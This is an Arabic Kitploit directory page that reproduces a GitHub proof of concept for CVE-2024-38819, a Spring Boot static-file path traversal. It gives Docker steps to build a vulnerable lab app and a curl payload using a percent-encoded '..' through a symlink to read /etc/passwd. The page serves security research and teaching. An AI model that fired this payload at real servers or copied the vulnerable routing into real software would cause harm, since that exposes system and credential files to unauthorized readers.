Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-38819-POC2 — إثبات مفهوم لاستغلال CVE-2024-38819، يوضح اجتياز المسار عبر الروابط الرمزية وترميز النسبة المئوية في توجيه الملفات الثابتة في Spring Boot. | Kitploit
أدوات/GitHubGitHub/vishalnoza/cve-2024-38819-poc2
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubvishalnoza/cve-2024-38819-poc2

CVE-2024-38819-POC2

إثبات مفهوم لاستغلال CVE-2024-38819، يوضح اجتياز المسار عبر الروابط الرمزية وترميز النسبة المئوية في توجيه الملفات الثابتة في Spring Boot.

عرض المستودع
110منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-38819: إثبات المفهوم (PoC)

هذا هو إثبات المفهوم للثغرة CVE-2024-38819 التي أبلغت عنها، ويوضح استغلال اجتياز المسار.

خطوات التنفيذ

  1. قم ببناء صورة Docker (Spring Boot 3.3.4، استنادًا إلى Spring Framework 6.1.13)

    cd vuln
    docker build -t cve-2024-38819-poc .
    
  2. قم بتشغيل الحاوية واعرض المنفذ 8080 على الجهاز المضيف

    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
    
  3. قم بتنفيذ الأمر التالي لتشغيل PoC وتأكيد الثغرة

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    إذا نجح الهجوم، سيتم عرض محتويات ملف /etc/passwd.

الشرح

  1. أنشئ PathTraversalDemoApplication.java بالكود التالي لإعداد توجيه الملفات الثابتة باستخدام RouterFunction و FileSystemResource:

    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. أضف الأمر التالي إلى Dockerfile لإنشاء رابط رمزي:

    RUN ln -s /static /app/static/link
    
  3. أنشئ حمولة تستخدم الترميز المئوي لاجتياز المجلدات عبر الرابط الرمزي.

    • المسار: /static/link/%2e%2e/etc/passwd
  4. استخدم أمر curl التالي لتنفيذ PoC والتحقق من نجاح الهجوم:

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    إذا نجح الهجوم، سيتم عرض محتويات ملف /etc/passwd.

إخلاء المسؤولية

تم توفير إثبات المفهوم هذا لأغراض تعليمية وبحث أمني. قبل استخدامه على نظام حقيقي، تأكد من إصلاح الثغرة ومن حصولك على التصريح المناسب. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذا الكود.

تنزيل الأداة